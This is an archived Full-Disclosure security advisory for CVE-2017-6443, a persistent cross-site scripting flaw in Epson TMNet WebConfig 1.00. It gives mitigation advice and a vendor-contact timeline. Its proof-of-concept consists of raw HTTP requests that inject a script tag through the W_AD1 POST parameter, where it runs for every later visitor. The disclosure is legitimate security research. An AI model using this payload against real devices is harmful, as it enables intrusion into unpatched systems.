lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <ejl3GrwjncMjr-CiFdHkPPtVFt6w0MApeQl6S-7V7Foa0jYAoXHnleW3JZSfANAyAtxyTkuRz40Juve9FTdHBuoGeTn7v76e6nrshL-tUOc=@protonmail.com>
Date: Fri, 03 Mar 2017 12:13:18 -0500
From: Michael Benich <benichmt1@...tonmail.com>
To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>
Subject: [FD] CVE-2017-6443: Persistent XSS in EPSON TMNet WebConfig Ver.
	1.00

Summary: Persistent cross-site scripting (XSS) in the web interface of Epson's TMNet WebConfig Ver 1.00 application allows a remote attacker to introduce arbitary Javascript via manipulation of an unsanitized POST parameter.
------------------------------------------------------------------------
Vendor: EPSON
------------------------------------------------------------------------
Software Link: https://c4b.epson-biz.com/modules/community/index.php?content_id=50
------------------------------------------------------------------------
Version: 1.00
------------------------------------------------------------------------
Identifier: CVE-2017-6443
------------------------------------------------------------------------
Exploit Author: Michael Benich
Contact: benichmt1 [at] protonmail.com or @benichmt1

------------------------------------------------------------------------
PoC:


1) Make a POST request using a proxy application like Burp


------------------------------------------------------------------------
POST /Forms/oadmin_1 HTTP/1.1

Host: XXX.XXX.XXX.XXX

User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: http://XXX.XXX.XXX.XXX/oadmin.htm

Connection: close

Upgrade-Insecure-Requests: 1

Content-Type: application/x-www-form-urlencoded

Content-Length: 47



W_AD1=<script>window.alert(0)</script>&W_Link1=&Submit=SUBMIT



------------------------------------------------------------------------

2) Browsing to the main page will execute your script. This remains persistent for any user who then visits this page.



GET /istatus.htm HTTP/1.1

Host: XXX.XXX.XXX.XXX

User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: http://XXX.XXX.XXX.XXX/side.htm

Connection: close

Upgrade-Insecure-Requests: 1
------------------------------------------------------------------------
Mitigation:

The application by default ships without a password - consider adding strong authentication to this portal.

------------------------------------------------------------------------


Timeline:

------------------------------------------------------------------------
12/1/2016 - Discovery.
12/9/2016 - Emailed support@ , info@ , and domain-admin@ emails. No response.
12/16/2016 - Pinged on Twitter. Recommended to contact through support.
12/22/2016 - Reached on LinkedIn directly to individual listed as Security Engineer and asked to find proper security contact channel. No response, but the connection request was accepted.
3/3/2017 - Disclosure
------------------------------------------------------------------------

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ